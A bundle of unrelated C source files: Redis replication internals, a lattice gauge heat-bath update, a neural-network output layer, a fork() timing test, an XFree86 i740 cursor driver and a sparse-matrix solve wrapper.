unlinkClient(server.master); server.cached_master = server.master; server.master = NULL; serverLog(LL_NOTICE,"Before turning into a slave, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer."); } /* Free a cached master, called when there are no longer the conditions for * a partial resync on reconnection. */ void replicationDiscardCachedMaster(void) { if (server.cached_master == NULL) return; serverLog(LL_NOTICE,"Discarding previously cached master state."); server.cached_master->flags &= ~CLIENT_MASTER; freeClient(server.cached_master); server.cached_master = NULL; } /* Turn the cached master into the current master, using the file descriptor * passed as argument as the socket for the new master. * * This function is called when successfully setup a partial resynchronization * so the stream of data that we'll receive will start from were this * master left. */ void replicationResurrectCachedMaster(int newfd) { server.master = server.cached_master; server.cached_master = NULL; server.master->fd = newfd; server.master->flags &= ~(CLIENT_CLOSE_AFTER_REPLY|CLIENT_CLOSE_ASAP); server.master->authenticated = 1; server.master->lastinteraction = server.unixtime; server.repl_state = REPL_STATE_CONNECTED; /* Re-add to the list of clients. */ listAddNodeTail(server.clients,server.master); if (aeCreateFileEvent(server.el, newfd, AE_READABLE, readQueryFromClient, server.master)) { serverLog(LL_WARNING,"Error resurrecting the cached master, impossible to add the readable handler: %s", strerror(errno)); freeClientAsync(server.master); /* Close ASAP. */ } /* We may also need to install the write handler as well if there is * pending data in the write buffers. */ if (clientHasPendingReplies(server.master)) { if (aeCreateFileEvent(server.el, newfd, AE_WRITABLE, sendReplyToClient, server.master)) { serverLog(LL_WARNING,"Error resurrecting the cached master, impossible to add the writable handler: %s", strerror(errno)); freeClientAsync(server.master); /* Close ASAP. */ } } } /* ------------------------- MIN-SLAVES-TO-WRITE --------------------------- */ /* This function counts the number of slaves with lag <= min-slaves-max-lag. * If the option is active, the server will prevent writes if there are not * enough connected slaves with the specified lag (or less). */ void refreshGoodSlavesCount(void) { listIter li; listNode *ln; int good = 0; if (!server.repl_min_slaves_to_write || !server.repl_min_slaves_max_lag) return; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; time_t lag = server.unixtime - slave->repl_ack_time; if (slave->replstate == SLAVE_STATE_ONLINE && lag <= server.repl_min_slaves_max_lag) good++; } server.repl_good_slaves_count = good; } /* ----------------------- REPLICATION SCRIPT CACHE -------------------------- * The goal of this code is to keep track of scripts already sent to every * connected slave, in order to be able to replicate EVALSHA as it is without * translating it to EVAL every time it is possible. * * We use a capped collection implemented by a hash table for fast lookup * of scripts we can send as EVALSHA, plus a linked list that is used for * eviction of the oldest entry when the max number of items is reached. * * We don't care about taking a different cache for every different slave * since to fill the cache again is not very costly, the goal of this code * is to avoid that the same big script is trasmitted a big number of times * per second wasting bandwidth and processor speed, but it is not a problem * if we need to rebuild the cache from scratch from time to time, every used * script will need to be transmitted a single time to reappear in the cache. * * This is how the system works: * * 1) Every time a new slave connects, we flush the whole script cache. * 2) We only send as EVALSHA what was sent to the master as EVALSHA, without * trying to convert EVAL into EVALSHA specifically for slaves. * 3) Every time we trasmit a script as EVAL to the slaves, we also add the * corresponding SHA1 of the script into the cache as we are sure every * slave knows about the script starting from now. * 4) On SCRIPT FLUSH command, we replicate the command to all the slaves * and at the same time flush the script cache. * 5) When the last slave disconnects, flush the cache. * 6) We handle SCRIPT LOAD as well since that's how scripts are loaded * in the master sometimes. */ /* Initialize the script cache, only called at startup. */ void replicationScriptCacheInit(void) { server.repl_scriptcache_size = 10000; server.repl_scriptcache_dict = dictCreate(&replScriptCacheDictType,NULL); server.repl_scriptcache_fifo = listCreate(); } /* Empty the script cache. Should be called every time we are no longer sure * that every slave knows about all the scripts in our set, or when the * current AOF "context" is no longer aware of the script. In general we * should flush the cache: * * 1) Every time a new slave reconnects to this master and performs a * full SYNC (PSYNC does not require flushing). * 2) Every time an AOF rewrite is performed. * 3) Every time we are left without slaves at all, and AOF is off, in order * to reclaim otherwise unused memory. */ void replicationScriptCacheFlush(void) { dictEmpty(server.repl_scriptcache_dict,NULL); listRelease(server.repl_scriptcache_fifo); server.repl_scriptcache_fifo = listCreate(); } /* Add an entry into the script cache, if we reach max number of entries the * oldest is removed from the list. */ void replicationScriptCacheAdd(sds sha1) { int retval; sds key = sdsdup(sha1); /* Evict oldest. */ if (listLength(server.repl_scriptcache_fifo) == server.repl_scriptcache_size) { listNode *ln = listLast(server.repl_scriptcache_fifo); sds oldest = listNodeValue(ln); retval = dictDelete(server.repl_scriptcache_dict,oldest); serverAssert(retval == DICT_OK); listDelNode(server.repl_scriptcache_fifo,ln); } /* Add current. */ retval = dictAdd(server.repl_scriptcache_dict,key,NULL); listAddNodeHead(server.repl_scriptcache_fifo,key); serverAssert(retval == DICT_OK); } /* Returns non-zero if the specified entry exists inside the cache, that is, * if all the slaves are aware of this script SHA1. */ int replicationScriptCacheExists(sds sha1) { return dictFind(server.repl_scriptcache_dict,sha1) != NULL; } /* ----------------------- SYNCHRONOUS REPLICATION -------------------------- * Redis synchronous replication design can be summarized in points: * * - Redis masters have a global replication offset, used by PSYNC. * - Master increment the offset every time new commands are sent to slaves. * - Slaves ping back masters with the offset processed so far. * * So synchronous replication adds a new WAIT command in the form: * * WAIT <num_replicas> <milliseconds_timeout> * * That returns the number of replicas that processed the query when * we finally have at least num_replicas, or when the timeout was * reached. * * The command is implemented in this way: * * - Every time a client processes a command, we remember the replication * offset after sending that command to the slaves. * - When WAIT is called, we ask slaves to send an acknowledgement ASAP. * The client is blocked at the same time (see blocked.c). * - Once we receive enough ACKs for a given offset or when the timeout * is reached, the WAIT command is unblocked and the reply sent to the * client. */ /* This just set a flag so that we broadcast a REPLCONF GETACK command * to all the slaves in the beforeSleep() function. Note that this way * we "group" all the clients that want to wait for synchronouns replication * in a given event loop iteration, and send a single GETACK for them all. */ void replicationRequestAckFromSlaves(void) { server.get_ack_from_slaves = 1; } /* Return the number of slaves that already acknowledged the specified * replication offset. */ int replicationCountAcksByOffset(long long offset) { listIter li; listNode *ln; int count = 0; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate != SLAVE_STATE_ONLINE) continue; if (slave->repl_ack_off >= offset) count++; } return count; } /* WAIT for N replicas to acknowledge the processing of our latest * write command (and all the previous commands). */ void waitCommand(client *c) { mstime_t timeout; long numreplicas, ackreplicas; long long offset = c->woff; if (server.masterhost) { addReplyError(c,"WAIT cannot be used with slave instances. Please also note that since Redis 4.0 if a slave is configured to be writable (which is not the default) writes to slaves are just local and are not propagated."); return; } /* Argument parsing. */ if (getLongFromObjectOrReply(c,c->argv[1],&numreplicas,NULL) != C_OK) return; if (getTimeoutFromObjectOrReply(c,c->argv[2],&timeout,UNIT_MILLISECONDS) != C_OK) return; /* First try without blocking at all. */ ackreplicas = replicationCountAcksByOffset(c->woff); if (ackreplicas >= numreplicas || c->flags & CLIENT_MULTI) { addReplyLongLong(c,ackreplicas); return; } /* Otherwise block the client and put it into our list of clients * waiting for ack from slaves. */ c->bpop.timeout = timeout; c->bpop.reploffset = offset; c->bpop.numreplicas = numreplicas; listAddNodeTail(server.clients_waiting_acks,c); blockClient(c,BLOCKED_WAIT); /* Make sure that the server will send an ACK request to all the slaves * before returning to the event loop. */ replicationRequestAckFromSlaves(); } /* This is called by unblockClient() to perform the blocking op type * specific cleanup. We just remove the client from the list of clients * waiting for replica acks. Never call it directly, call unblockClient() * instead. */ void unblockClientWaitingReplicas(client *c) { listNode *ln = listSearchKey(server.clients_waiting_acks,c); serverAssert(ln != NULL); listDelNode(server.clients_waiting_acks,ln); } /* Check if there are clients blocked in WAIT that can be unblocked since * we received enough ACKs from slaves. */ void processClientsWaitingReplicas(void) { long long last_offset = 0; int last_numreplicas = 0; listIter li; listNode *ln; listRewind(server.clients_waiting_acks,&li); while((ln = listNext(&li))) { client *c = ln->value; /* Every time we find a client that is satisfied for a given * offset and number of replicas, we remember it so the next client * may be unblocked without calling replicationCountAcksByOffset() * if the requested offset / replicas were equal or less. */ if (last_offset && last_offset > c->bpop.reploffset && last_numreplicas > c->bpop.numreplicas) { unblockClient(c); addReplyLongLong(c,last_numreplicas); } else { int numreplicas = replicationCountAcksByOffset(c->bpop.reploffset); if (numreplicas >= c->bpop.numreplicas) { last_offset = c->bpop.reploffset; last_numreplicas = numreplicas; unblockClient(c); addReplyLongLong(c,numreplicas); } } } } /* Return the slave replication offset for this instance, that is * the offset for which we already processed the master replication stream. */ long long replicationGetSlaveOffset(void) { long long offset = 0; if (server.masterhost != NULL) { if (server.master) { offset = server.master->reploff; } else if (server.cached_master) { offset = server.cached_master->reploff; } } /* offset may be -1 when the master does not support it at all, however * this function is designed to return an offset that can express the * amount of data processed by the master, so we return a positive * integer. */ if (offset < 0) offset = 0; return offset; } /* --------------------------- REPLICATION CRON ---------------------------- */ /* Replication cron function, called 1 time per second. */ void replicationCron(void) { static long long replication_cron_loops = 0; /* Non blocking connection timeout? */ if (server.masterhost && (server.repl_state == REPL_STATE_CONNECTING || slaveIsInHandshakeState()) && (time(NULL)-server.repl_transfer_lastio) > server.repl_timeout) { serverLog(LL_WARNING,"Timeout connecting to the MASTER..."); cancelReplicationHandshake(); } /* Bulk transfer I/O timeout? */ if (server.masterhost && server.repl_state == REPL_STATE_TRANSFER && (time(NULL)-server.repl_transfer_lastio) > server.repl_timeout) { serverLog(LL_WARNING,"Timeout receiving bulk data from MASTER... If the problem persists try to set the 'repl-timeout' parameter in redis.conf to a larger value."); cancelReplicationHandshake(); } /* Timed out master when we are an already connected slave? */ if (server.masterhost && server.repl_state == REPL_STATE_CONNECTED && (time(NULL)-server.master->lastinteraction) > server.repl_timeout) { serverLog(LL_WARNING,"MASTER timeout: no data nor PING received..."); freeClient(server.master); } /* Check if we should connect to a MASTER */ if (server.repl_state == REPL_STATE_CONNECT) { serverLog(LL_NOTICE,"Connecting to MASTER %s:%d", server.masterhost, server.masterport); if (connectWithMaster() == C_OK) { serverLog(LL_NOTICE,"MASTER <-> SLAVE sync started"); } } /* Send ACK to master from time to time. * Note that we do not send periodic acks to masters that don't * support PSYNC and replication offsets. */ if (server.masterhost && server.master && !(server.master->flags & CLIENT_PRE_PSYNC)) replicationSendAck(); /* If we have attached slaves, PING them from time to time. * So slaves can implement an explicit timeout to masters, and will * be able to detect a link disconnection even if the TCP connection * will not actually go down. */ listIter li; listNode *ln; robj *ping_argv[1]; /* First, send PING according to ping_slave_period. */ if ((replication_cron_loops % server.repl_ping_slave_period) == 0 && listLength(server.slaves)) { ping_argv[0] = createStringObject("PING",4); replicationFeedSlaves(server.slaves, server.slaveseldb, ping_argv, 1); decrRefCount(ping_argv[0]); } /* Second, send a newline to all the slaves in pre-synchronization * stage, that is, slaves waiting for the master to create the RDB file. * * Also send the a newline to all the chained slaves we have, if we lost * connection from our master, to keep the slaves aware that their * master is online. This is needed since sub-slaves only receive proxied * data from top-level masters, so there is no explicit pinging in order * to avoid altering the replication offsets. This special out of band * pings (newlines) can be sent, they will have no effect in the offset. * * The newline will be ignored by the slave but will refresh the * last interaction timer preventing a timeout. In this case we ignore the * ping period and refresh the connection once per second since certain * timeouts are set at a few seconds (example: PSYNC response). */ listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; int is_presync = (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START || (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_END && server.rdb_child_type != RDB_CHILD_TYPE_SOCKET)); if (is_presync) { if (write(slave->fd, "\n", 1) == -1) { /* Don't worry about socket errors, it's just a ping. */ } } } /* Disconnect timedout slaves. */ if (listLength(server.slaves)) { listIter li; listNode *ln; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate != SLAVE_STATE_ONLINE) continue; if (slave->flags & CLIENT_PRE_PSYNC) continue; if ((server.unixtime - slave->repl_ack_time) > server.repl_timeout) { serverLog(LL_WARNING, "Disconnecting timedout slave: %s", replicationGetSlaveName(slave)); freeClient(slave); } } } /* If this is a master without attached slaves and there is a replication * backlog active, in order to reclaim memory we can free it after some * (configured) time. Note that this cannot be done for slaves: slaves * without sub-slaves attached should still accumulate data into the * backlog, in order to reply to PSYNC queries if they are turned into * masters after a failover. */ if (listLength(server.slaves) == 0 && server.repl_backlog_time_limit && server.repl_backlog && server.masterhost == NULL) { time_t idle = server.unixtime - server.repl_no_slaves_since; if (idle > server.repl_backlog_time_limit) { freeReplicationBacklog(); serverLog(LL_NOTICE, "Replication backlog freed after %d seconds " "without connected slaves.", (int) server.repl_backlog_time_limit); } } /* If AOF is disabled and we no longer have attached slaves, we can * free our Replication Script Cache as there is no need to propagate * EVALSHA at all. */ if (listLength(server.slaves) == 0 && server.aof_state == AOF_OFF && listLength(server.repl_scriptcache_fifo) != 0) { replicationScriptCacheFlush(); } /* Start a BGSAVE good for replication if we have slaves in * WAIT_BGSAVE_START state. * * In case of diskless replication, we make sure to wait the specified * number of seconds (according to configuration) so that other slaves * have the time to arrive before we start streaming. */ if (server.rdb_child_pid == -1 && server.aof_child_pid == -1) { time_t idle, max_idle = 0; int slaves_waiting = 0; int mincapa = -1; listNode *ln; listIter li; listRewind(server.slaves,&li); while((ln = listNext(&li))) { client *slave = ln->value; if (slave->replstate == SLAVE_STATE_WAIT_BGSAVE_START) { idle = server.unixtime - slave->lastinteraction; if (idle > max_idle) max_idle = idle; slaves_waiting++; mincapa = (mincapa == -1) ? slave->slave_capa : (mincapa & slave->slave_capa); } } if (slaves_waiting && (!server.repl_diskless_sync || max_idle > server.repl_diskless_sync_delay)) { /* Start the BGSAVE. The called function may start a * BGSAVE with socket target or disk target depending on the * configuration and slaves capabilities. */ startBgsaveForReplication(mincapa); } } /* Refresh the number of slaves with lag <= min-slaves-max-lag. */ refreshGoodSlavesCount(); replication_cron_loops++; /* Incremented with frequency 1 HZ. */ }
988713.c
/************************** monte.c *******************************/ /* Kennedy-Pendleton quasi heat bath on SU(2) subgroups */ /* MIMD version 6 */ /* T. DeGrand March 1991 */ /* UMH: Combined with Schroedinger functional version, Jan 2000 */ #include "generic_pg_includes.h" #define Nc 3 void monte(int NumStp) { /* Do K-P quasi-heat bath by SU(2) subgroups */ int NumTrj,Nhit, index1, ina, inb,ii; int parity; Real xr1,xr2,xr3,xr4; Real a0=0,a1,a2,a3; Real v0,v1,v2,v3, vsq; Real h0,h1,h2,h3; Real r,r2,rho,z; Real al,d, xl,xd; int k,kp, cr, nacd, test; Real pi2, b3; register int dir,i; register site *st; su3_matrix action; su2_matrix h; Nhit = 3; pi2= 2.0*PI; b3=beta/3.0; /* fix bug by adding loop over NumTrj; before 1 (and only 1) heat bath hit was dome, regardless of NumStp */ for( NumTrj = 0 ; NumTrj < NumStp; NumTrj++) { /* fix bug by looping over odd AND even parity */ for(parity=ODD;parity<=EVEN;parity++) { FORALLUPDIR(dir) { /* compute the gauge force */ dsdu_qhb(dir,parity); /* now for the qhb updating */ for(index1=0;index1<Nhit;index1++) { kp=0; cr=0; /* pick out an SU(2) subgroup */ ina=(index1+1) % Nc; inb=(index1+2) % Nc; if(ina > inb){ ii=ina; ina=inb; inb=ii;} #ifdef SCHROED_FUN FORSOMEPARITY(i,st,parity) if(dir==TUP || st->t>0){ #else FORSOMEPARITY(i,st,parity){ #endif mult_su3_na( &(st->link[dir]), &(st->staple), &action ); /*decompose the action into SU(2) subgroups using Pauli matrix expansion */ /* The SU(2) hit matrix is represented as a0 + i * Sum j (sigma j * aj)*/ v0 = action.e[ina][ina].real + action.e[inb][inb].real; v3 = action.e[ina][ina].imag - action.e[inb][inb].imag; v1 = action.e[ina][inb].imag + action.e[inb][ina].imag; v2 = action.e[ina][inb].real - action.e[inb][ina].real; vsq = v0*v0 + v1*v1 + v2*v2 + v3*v3; z = sqrt((double)vsq ); /* Normalize u */ v0 = v0/z; v1 = v1/z; v2 = v2/z; v3 = v3/z; /* end norm check--trial SU(2) matrix is a0 + i a(j)sigma(j)*/ /* test if(this_node == 0)printf("v= %e %e %e %e\n",v0,v1,v2,v3); if(this_node == 0)printf("z= %e\n",z); */ /* now begin qhb */ /* get four random numbers */ /* get four random numbers (add a small increment to prevent taking log(0.)*/ xr1=myrand(&(st->site_prn)); xr1 = (log((double)(xr1+ 1.e-10))); xr2=myrand(&(st->site_prn)); xr2 = (log((double)(xr2+ 1.e-10))); xr3=myrand(&(st->site_prn)); xr4=myrand(&(st->site_prn)); xr3=cos((double)pi2*xr3); /* if(this_node == 0)printf("rand= %e %e %e %e\n",xr1,xr2,xr3,xr4); */ /* generate a0 component of su3 matrix first consider generating an su(2) matrix h according to exp(bg/3 * re tr(h*s)) rewrite re tr(h*s) as re tr(h*v)z where v is an su(2) matrix and z is a real normalization constant let v = z*v. (z is 2*xi in k-p notation) v is represented in the form v(0) + i*sig*v (sig are pauli) v(0) and vector v are real let a = h*v and now generate a rewrite beta/3 * re tr(h*v) * z as al*a0 a0 has prob(a0) = n0 * sqrt(1 - a0**2) * exp(al * a0) */ al=b3*z; /*if(this_node == 0)printf("al= %e\n",al);*/ /* let a0 = 1 - del**2 get d = del**2 such that prob2(del) = n1 * del**2 * exp(-al*del**2) */ d= -(xr2 + xr1*xr3*xr3)/al; /* monte carlo prob1(del) = n2 * sqrt(1 - 0.5*del**2) then prob(a0) = n3 * prob1(a0)*prob2(a0) */ /* now beat each site into submission */ nacd = 0; if ((1.00 - 0.5*d) > xr4*xr4) nacd=1; if(nacd == 0 && al > 2.0) /* k-p algorithm */ { test=0; for(k=0;k<20 && test == 0;k++) { kp++; /* get four random numbers (add a small increment to prevent taking log(0.)*/ xr1=myrand(&(st->site_prn)); xr1 = (log((double)(xr1+ 1.e-10))); xr2=myrand(&(st->site_prn)); xr2 = (log((double)(xr2+ 1.e-10))); xr3=myrand(&(st->site_prn)); xr4=myrand(&(st->site_prn)); xr3=cos((double)pi2*xr3); d = -(xr2 + xr1*xr3*xr3)/al; if((1.00 - 0.5*d) > xr4*xr4) test = 1; } if(this_node == 0 && test !=1) printf("site took 20 kp hits\n"); } /* endif nacd */ if(nacd == 0 && al <= 2.0) /* creutz algorithm */ { cr++; xl=exp((double)(-2.0*al)); xd= 1.0 - xl; test=0; for(k=0;k<20 && test == 0 ;k++) { /* get two random numbers */ xr1=myrand(&(st->site_prn)); xr2=myrand(&(st->site_prn)); r = xl + xd*xr1; a0 = 1.00 + log((double)r)/al; if((1.0 -a0*a0) > xr2*xr2) test = 1; } d = 1.0 - a0; if(this_node == 0 && test !=1) printf("site took 20 creutz hits\n"); } /* endif nacd */ /* generate full su(2) matrix and update link matrix*/ /* find a0 = 1 - d*/ a0 = 1.0 - d; /* compute r */ r2 = 1.0 - a0*a0; r2 = fabs((double)r2); r = sqrt((double)r2); /* compute a3 */ a3=(2.0*myrand(&(st->site_prn)) - 1.0)*r; /* compute a1 and a2 */ rho = r2 - a3*a3; rho = fabs((double)rho); rho= sqrt((double)rho); /*xr2 is a random number between 0 and 2*pi */ xr2=pi2*myrand(&(st->site_prn)); a1= rho*cos((double)xr2); a2= rho*sin((double)xr2); /* now do the updating. h = a*v^dagger, new u = h*u */ h0 = a0*v0 + a1*v1 + a2*v2 + a3*v3; h1 = a1*v0 - a0*v1 + a2*v3 - a3*v2; h2 = a2*v0 - a0*v2 + a3*v1 - a1*v3; h3 = a3*v0 - a0*v3 + a1*v2 - a2*v1; /* Elements of SU(2) matrix */ h.e[0][0] = cmplx( h0, h3); h.e[0][1] = cmplx( h2, h1); h.e[1][0] = cmplx(-h2, h1); h.e[1][1] = cmplx( h0,-h3); /* update the link */ left_su2_hit_n(&h,ina,inb,&(st->link[dir])); } /* st */ /* diagnostics {Real avekp, avecr; avekp=(Real)kp / (Real)(nx*ny*nz*nt/2); avecr=(Real)cr / (Real)(nx*ny*nz*nt/2); if(this_node ==0) printf(" ave kp steps = %e, ave creutz steps = %e\n", (double)avekp,(double)avecr); } */ } /* hits */ } /* direction */ }} /* parity and NumTrj */ } /* monte */
312460.c
/* * Copyright (c) 2018-2019 * Jianjia Ma, Wearable Bio-Robotics Group (WBR) * majianjia@live.com * * SPDX-License-Identifier: Apache-2.0 * * Change Logs: * Date Author Notes * 2019-07-23 Jianjia Ma The first version */ #include <stdint.h> #include <string.h> #include <stdbool.h> #include "nnom.h" #include "nnom_local.h" #include "nnom_layers.h" #include "layers/nnom_output.h" nnom_status_t output_build(nnom_layer_t *layer); nnom_status_t output_run(nnom_layer_t *layer); nnom_layer_t *output_s(nnom_io_config_t* config) { nnom_layer_t *layer = Output(config->shape, config->data); if(layer) layer->config = config; return layer; } nnom_layer_t *Output(nnom_3d_shape_t output_shape, void *p_buf) { // they are acturally the same.. expect the type defined nnom_layer_t *layer = Input(output_shape, p_buf); if (layer != NULL) { layer->type = NNOM_OUTPUT; layer->run = output_run; layer->build = default_build; } return layer; } nnom_status_t output_run(nnom_layer_t *layer) { nnom_io_layer_t *cl = (nnom_io_layer_t *)layer; memcpy(cl->buf, layer->in->tensor->p_data, tensor_size(layer->out->tensor)); // in->memory -> user memory return NN_SUCCESS; }
772582.c
/* ============================================================================== fork_test.c C Code for fork() creation test ============================================================================== */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/wait.h> #define NFORKS 50000 void do_nothing() { int i; i = 0; } int main() { int pid, j, status; for (j = 0; j < NFORKS; j++) { /*** error handling ***/ if ((pid = fork()) < 0) { printf("fork failed with error code= %d\n", pid); exit(1); } /*** this is the child of the fork ***/ else if (pid == 0) { do_nothing(); exit(0); } /*** this is the parent of the fork ***/ else { waitpid(pid, &status, 0); } } exit(0); }
846566.c
/************************************************************************** Copyright 1998-1999 Precision Insight, Inc., Cedar Park, Texas. All Rights Reserved. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sub license, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice (including the next paragraph) shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL PRECISION INSIGHT AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **************************************************************************/ /* $XFree86: xc/programs/Xserver/hw/xfree86/drivers/i740/i740_cursor.c,v 1.4 2000/02/23 04:47:13 martin Exp $ */ /* * Authors: * Daryll Strauss <daryll@precisioninsight.com> * */ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include "xf86.h" #include "xf86_OSproc.h" #include "xf86_ansic.h" #include "compiler.h" #include "xf86fbman.h" #include "vgaHW.h" #include "xf86xv.h" #include "i740.h" static void I740LoadCursorImage(ScrnInfoPtr pScrn, unsigned char *src); static void I740ShowCursor(ScrnInfoPtr pScrn); static void I740HideCursor(ScrnInfoPtr pScrn); static void I740SetCursorPosition(ScrnInfoPtr pScrn, int x, int y); static void I740SetCursorColors(ScrnInfoPtr pScrn, int bg, int fb); static Bool I740UseHWCursor(ScreenPtr pScrn, CursorPtr pCurs); Bool I740CursorInit(ScreenPtr pScreen) { ScrnInfoPtr pScrn; I740Ptr pI740; xf86CursorInfoPtr infoPtr; FBAreaPtr fbarea; pScrn = xf86Screens[pScreen->myNum]; pI740 = I740PTR(pScrn); pI740->CursorInfoRec = infoPtr = xf86CreateCursorInfoRec(); if (!infoPtr) return FALSE; infoPtr->MaxWidth = 64; infoPtr->MaxHeight = 64; infoPtr->Flags = HARDWARE_CURSOR_TRUECOLOR_AT_8BPP | HARDWARE_CURSOR_BIT_ORDER_MSBFIRST | HARDWARE_CURSOR_INVERT_MASK | HARDWARE_CURSOR_SWAP_SOURCE_AND_MASK | HARDWARE_CURSOR_AND_SOURCE_WITH_MASK | HARDWARE_CURSOR_SOURCE_MASK_INTERLEAVE_64; infoPtr->SetCursorColors = I740SetCursorColors; infoPtr->SetCursorPosition = I740SetCursorPosition; infoPtr->LoadCursorImage = I740LoadCursorImage; infoPtr->HideCursor = I740HideCursor; infoPtr->ShowCursor = I740ShowCursor; infoPtr->UseHWCursor = I740UseHWCursor; /* * Allocate a region the full width and tall enough * that at least 6K of video memory is consumed. * Then use a 1 kilobyte piece that is 4K byte aligned * within that region. KAO. */ fbarea = xf86AllocateOffscreenArea(pScreen, pScrn->displayWidth, ((6*1024)/(pScrn->displayWidth*pI740->cpp))+1, 0,0,0,0); if (fbarea == NULL) { pI740->CursorStart=0; xf86DrvMsg(pScrn->scrnIndex, X_WARNING, "Hardware cursor disabled due to failure allocating offscreen memory.\n"); } else { pI740->CursorStart = ((((fbarea->box.x1 + pScrn->displayWidth * fbarea->box.y1) * pI740->cpp)+4096)&0xfff000); } /* * Perhaps move the cursor to the beginning of the frame buffer * so that it never fails? */ if (pI740->CursorStart>4*1024*1024) { pI740->CursorStart=0; xf86DrvMsg(pScrn->scrnIndex, X_WARNING, "Disabling hardware cursor due to large framebuffer\n"); } return xf86InitCursor(pScreen, infoPtr); } static Bool I740UseHWCursor(ScreenPtr pScreen, CursorPtr pCurs) { ScrnInfoPtr pScrn; I740Ptr pI740; pScrn = xf86Screens[pScreen->myNum]; pI740 = I740PTR(pScrn); if (pScrn->currentMode->Flags&V_DBLSCAN) return FALSE; if (!pI740->CursorStart) return FALSE; return TRUE; } static void I740LoadCursorImage(ScrnInfoPtr pScrn, unsigned char *src) { I740Ptr pI740; int x, y; CARD8 *pcurs; pI740 = I740PTR(pScrn); pcurs = (CARD8 *)(pI740->FbBase + pI740->CursorStart); for (y = 0; y < 64; y++) { for (x = 0; x < 64 / 4; x++) { *pcurs++ = *src++; } } } static void I740SetCursorPosition(ScrnInfoPtr pScrn, int x, int y) { I740Ptr pI740; int flag; pI740 = I740PTR(pScrn); if (x >= 0) flag = CURSOR_X_POS; else { flag = CURSOR_X_NEG; x=-x; } pI740->writeControl(pI740, XRX, CURSOR_X_LO, x&0xFF); pI740->writeControl(pI740, XRX, CURSOR_X_HI, (((x >> 8) & 0x07) | flag)); if (y >= 0) flag = CURSOR_Y_POS; else { flag = CURSOR_Y_NEG; y=-y; } pI740->writeControl(pI740, XRX, CURSOR_Y_LO, y&0xFF); pI740->writeControl(pI740, XRX, CURSOR_Y_HI, (((y >> 8) & 0x07) | flag)); } static void I740ShowCursor(ScrnInfoPtr pScrn) { I740Ptr pI740; unsigned char tmp; pI740 = I740PTR(pScrn); pI740->writeControl(pI740, XRX, CURSOR_BASEADDR_LO, (pI740->CursorStart & 0x0000F000) >> 8); pI740->writeControl(pI740, XRX, CURSOR_BASEADDR_HI, (pI740->CursorStart & 0x003F0000) >> 16); pI740->writeControl(pI740, XRX, CURSOR_CONTROL, CURSOR_ORIGIN_DISPLAY | CURSOR_MODE_64_3C); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp |= HW_CURSOR_ENABLE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); } static void I740HideCursor(ScrnInfoPtr pScrn) { unsigned char tmp; I740Ptr pI740; pI740 = I740PTR(pScrn); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp &= ~HW_CURSOR_ENABLE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); } static void I740SetCursorColors(ScrnInfoPtr pScrn, int bg, int fg) { int tmp; I740Ptr pI740; pI740 = I740PTR(pScrn); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp |= EXTENDED_PALETTE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); pI740->writeStandard(pI740, DACMASK, 0xFF); pI740->writeStandard(pI740, DACWX, 0x04); pI740->writeStandard(pI740, DACDATA, (bg & 0x00FF0000) >> 16); pI740->writeStandard(pI740, DACDATA, (bg & 0x0000FF00) >> 8); pI740->writeStandard(pI740, DACDATA, (bg & 0x000000FF)); pI740->writeStandard(pI740, DACDATA, (fg & 0x00FF0000) >> 16); pI740->writeStandard(pI740, DACDATA, (fg & 0x0000FF00) >> 8); pI740->writeStandard(pI740, DACDATA, (fg & 0x000000FF)); tmp=pI740->readControl(pI740, XRX, PIXPIPE_CONFIG_0); tmp &= ~EXTENDED_PALETTE; pI740->writeControl(pI740, XRX, PIXPIPE_CONFIG_0, tmp); }
861220.c
#include "alphasparse/kernel_plain.h" #include "alphasparse/util.h" alphasparse_status_t ONAME(const ALPHA_Number alpha, const ALPHA_SPMAT_DIA *A, const ALPHA_Number *x, const ALPHA_INT columns, const ALPHA_INT ldx, ALPHA_Number *y, const ALPHA_INT ldy) { ALPHA_SPMAT_DIA *transposed_mat; transpose_dia(A, &transposed_mat); alphasparse_status_t status = trsm_dia_u_lo_col_plain(alpha, transposed_mat, x, columns, ldx, y, ldy); destroy_dia(transposed_mat); return status; }
83628.c
